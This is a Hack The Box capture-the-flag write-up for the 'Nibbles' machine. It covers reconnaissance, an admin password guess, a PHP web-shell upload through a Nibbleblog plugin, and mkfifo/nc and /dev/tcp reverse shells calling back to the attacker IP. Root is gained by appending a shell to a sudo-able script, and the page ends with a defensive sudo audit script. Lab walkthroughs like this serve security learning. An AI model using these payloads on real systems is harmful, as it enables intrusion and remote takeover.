[HTB] Nibbles - Writeup

Tags: HTB
Published: December 28, 2023
Author: Netkubb

Overview

  1. Gathering box information
  2. Gathering website information and vulnerability
  3. Start Hijacking
  4. Privilege escalation
  5. Pwn!!

Let's start!!
IP: 10.129.88.213

Gathering box information

Run an nmap version scan on the default ports: nmap -sV --open -oA nibbles_initial_scan 10.129.88.213
-sV runs a version scan
--open shows only open ports
-oA [filename] saves the result as [filename]
Here is the result:
    # Nmap 7.94 scan initiated Fri Sep 8 15:28:38 2023 as: nmap -sV --open -oA nibbles_initial_scan 10.129.88.213
    Nmap scan report for 10.129.88.213
    Host is up (0.19s latency).
    Not shown: 945 closed tcp ports (conn-refused), 53 filtered tcp ports (no-response)
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Fri Sep 8 15:28:57 2023 -- 1 IP address (1 host up) scanned in 18.92 seconds
So we know that ports 22 and 80 are open. Now we do the script scan on 22 and 80:
nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190
-sC runs the default script scan
-p [port,...] specifies the ports
Here is the result:
    # Nmap 7.94 scan initiated Fri Sep 8 15:30:02 2023 as: nmap -sC --open -oA nibbles_script_scan 10.129.88.213
    Nmap scan report for 10.129.88.213
    Host is up (0.19s latency).
    Not shown: 974 closed tcp ports (conn-refused), 24 filtered tcp ports (no-response)
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT   STATE SERVICE
    22/tcp open  ssh
    | ssh-hostkey:
    |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
    |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
    |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
    80/tcp open  http
    |_http-title: Site doesn't have a title (text/html).
    # Nmap done at Fri Sep 8 15:30:21 2023 -- 1 IP address (1 host up) scanned in 18.92 seconds
It looks like nothing special here, but since we know port 80 is HTTP, we should now move on to the next step.

Gathering website information and vulnerability

Run gobuster on the web root:
gobuster dir -u http://10.129.88.213/ --wordlist /usr/share/dirb/wordlists/common.txt
Next, use whatweb to gather website information:
    $ whatweb http://10.129.119.17/
    http://10.129.119.17/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17]
Browsing to [IP]:80 in Firefox, once again there is nothing special, but when we view the page source we get a lead: the /nibbleblog directory.
Once again, let's start gobuster before doing anything else, since the scan takes forever from South East Asia:
gobuster dir -u http://10.129.88.213/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
We find something interesting, so we go to [IP]/nibbleblog and use whatweb to gather more information. Here is what we got:
    $ whatweb http://10.129.119.17/nibbleblog
    http://10.129.119.17/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17], RedirectLocation[http://10.129.119.17/nibbleblog/], Title[301 Moved Permanently]
    http://10.129.119.17/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]
Now we know that it uses Nibbleblog as its CMS. A quick Google search for a Nibbleblog exploit tells us that version 4.0.3 is vulnerable; however, we don't know the Nibbleblog version yet.
While we figure out what to do next, the gobuster result gives us something interesting:
    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.129.21.151/nibbleblog
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /.htpasswd            (Status: 403) [Size: 308]
    /.hta                 (Status: 403) [Size: 303]
    /.htaccess            (Status: 403) [Size: 308]
    /admin                (Status: 301) [Size: 325] [--> http://10.129.21.151/nibbleblog/admin/]
    /admin.php            (Status: 200) [Size: 1401]
    /content              (Status: 301) [Size: 327] [--> http://10.129.21.151/nibbleblog/content/]
    /index.php            (Status: 200) [Size: 2987]
    /languages            (Status: 301) [Size: 329] [--> http://10.129.21.151/nibbleblog/languages/]
    /plugins              (Status: 301) [Size: 327] [--> http://10.129.21.151/nibbleblog/plugins/]
    /README               (Status: 200) [Size: 4628]
    /themes               (Status: 301) [Size: 326] [--> http://10.129.21.151/nibbleblog/themes/]
    Progress: 4614 / 4615 (99.98%)
    ===============================================================
    Finished
    ===============================================================
Now we have admin.php, /content, /languages, /plugins, README and /themes to check out.
When we navigate to admin.php we find a login page.
It looks like we need to crack this, but let's set it aside and dig into something else.
README gives us the Nibbleblog version, and it's actually 4.0.3, which has an Arbitrary File Upload vulnerability.
While digging into /content, /languages, /plugins, README and /themes we find that /content has things like /private/user.xml, so we check that out.
It looks like the username is actually admin, but we also find that the login is brute-force protected (since they count fail_count).
After checking /content/private/config.xml we notice that they use "nibbles" many times, so we try nibbles as the password, and luckily we cracked it.
You might wonder how we would figure this out, but we have 2 clues:
  1. It prevents us from brute forcing, so the password should not be too hard.
  2. "When performing password cracking offline with a tool such as Hashcat or attempting to guess a password, it is important to consider all of the information in front of us. It is not uncommon to successfully crack a password hash (such as a company's wireless network passphrase) using a wordlist generated by crawling their website using a tool such as CeWL." said Hack The Box.
Now we log in as admin.

Start Hijacking

When we play around with this site, the My image plugin catches our attention: it can upload files.
So we create a PHP file, since this is running on Apache, and upload it. Let's name it shell.php:
<?php system('id'); ?>
Try to upload it in the My image plugin.
We get a bunch of errors, but it still looks like it's working, so we check /content/private/plugins/my_image/image.php and it's running our script.
So now we run a reverse shell to get access to the machine:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.102 1234 >/tmp/f'); ?>
and listen on our machine:
nc -lvnp 1234
Now we have access to the machine as nibbler.
Upgrade the TTY using python -c 'import pty; pty.spawn("/bin/bash")'; since python is not found, we try which python3 and use python3 -c 'import pty; pty.spawn("/bin/bash")' instead.
Next we navigate to the home directory (~) and cat user.txt.

Privilege escalation

Before we do anything else, we unzip personal.zip and find that monitor.sh is interesting, so we cat it out and get:
    ####################################################################################################
    #                                        Tecmint_monitor.sh                                        #
    # Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      #
    # If any bug, report us in the link below                                                          #
    # Free to use/edit/distribute the code below by                                                    #
    # giving proper credit to Tecmint.com and Author                                                   #
    #                                                                                                  #
    ####################################################################################################
    #! /bin/bash
    # unset any variable which system may be using
    # clear the screen
    clear
    unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
    while getopts iv name
    do
            case $name in
              i)iopt=1;;
              v)vopt=1;;
              *)echo "Invalid arg";;
            esac
    done
    <SNIP>
nothing special here
What is the best start for privilege escalation? LinEnum.sh. Since the HTB instance cannot connect to an external network, we need to download LinEnum.sh from our own computer.
First we download LinEnum.sh to our machine and host that directory using python -m http.server 8080, then we download it on the HTB instance using wget http://[my_ip]:8080/linenum.sh, then chmod +x linenum.sh and run ./linenum.sh. What first catches our interest is:
    [+] We can sudo without supplying a password!
    Matching Defaults entries for nibbler on Nibbles:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User nibbler may run the following commands on Nibbles:
        (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

    [+] Possible sudo pwnage!
    /home/nibbler/personal/stuff/monitor.sh
Another way to find commands that can be run with sudo without a password is sudo -l, and GTFOBins covers most cases. However, this one is a special case (monitor.sh is a tool created just for this box). We found that monitor.sh is owned by nibbler and can still be run with sudo without a password, which means we can edit anything inside it and run it as root, so we run echo "bash -i >& /dev/tcp/10.10.15.102/1235 0>&1" | tee -a monitor.sh
tee -a [file] appends to the file without changing anything else in it.
Then run sudo ./monitor.sh while listening on our machine with nc -lvnp 1235, and we cracked it:
    $ nc -lvnp 1235
    listening on [any] 1235 ...
    connect to [10.10.15.102] from (UNKNOWN) [10.129.200.170] 46500
    # python3 -c 'import pty; pty.spawn("/bin/bash")'
    root@Nibbles:/home/nibbler/personal/stuff# cd ~
    root@Nibbles:~# ls
    ls
    root.txt
    root@Nibbles:~# cat root.txt
    cat root.txt
    de5e5d6619862a8aa5b9b212314e0cdd
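As an added defensive check that is not part of the original writeup: a small Python audit that parses sudo -l output (the same format LinEnum quoted above) and flags NOPASSWD commands whose target file, or its parent directory, the current user can write. That is exactly the monitor.sh condition on this box. SAMPLE_SUDO_L is a constructed sample modelled on the output above, and the writable hook is a hypothetical parameter so the logic can be checked without real file permissions.

```python
import os
import re
import subprocess

# Constructed sample of `sudo -l` output, modelled on the entry found on the box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /usr/bin/apt-get update
    (ALL) /usr/bin/less
"""

# One command entry: "(runas) [TAG: ...] /absolute/path [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")


def parse_sudo_l(output):
    """Return (runas, nopasswd, command_path) tuples from `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        entries.append((m.group("runas").strip(), nopasswd, m.group("cmd")))
    return entries


def user_can_modify(path, writable=None):
    """True if the user can write the file, or replace it via a writable parent dir."""
    writable = writable or (lambda p: os.access(p, os.W_OK))
    return writable(path) or writable(os.path.dirname(path))


def risky_entries(output, writable=None):
    """NOPASSWD commands whose target the user can modify: anything appended to
    such a script runs as root, which is what happened with monitor.sh."""
    return [cmd for _, nopasswd, cmd in parse_sudo_l(output)
            if nopasswd and user_can_modify(cmd, writable)]


if __name__ == "__main__":
    # Audit the real host: `sudo -n -l` never prompts, so it is safe in scripts.
    real = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True)
    for cmd in risky_entries(real.stdout):
        print("writable NOPASSWD target:", cmd)
```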

Conclusion

  1. We start with an nmap scan.
  2. We scan the website and find that Nibbleblog is used on this site.
  3. Nibbleblog is vulnerable on version 4.0.3.
  4. We crack the password.
  5. We upload a PHP script and gain user privileges.
  6. We exploit personal.zip and gain root privileges.
🥳 WE DID IT !!!

My mistake

  1. We should use the nmap script scan only on open ports.
  2. is something we should check on
  3. When we are talking about the web, gobuster is what we should do first.
  4. Some scripts such as bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 might not work in some situations, for example on this machine.
  5. sudo -l is one of the common keys that lead to an exploit.
  6. When we edit a sudo-able file we must not change the content inside, but append instead.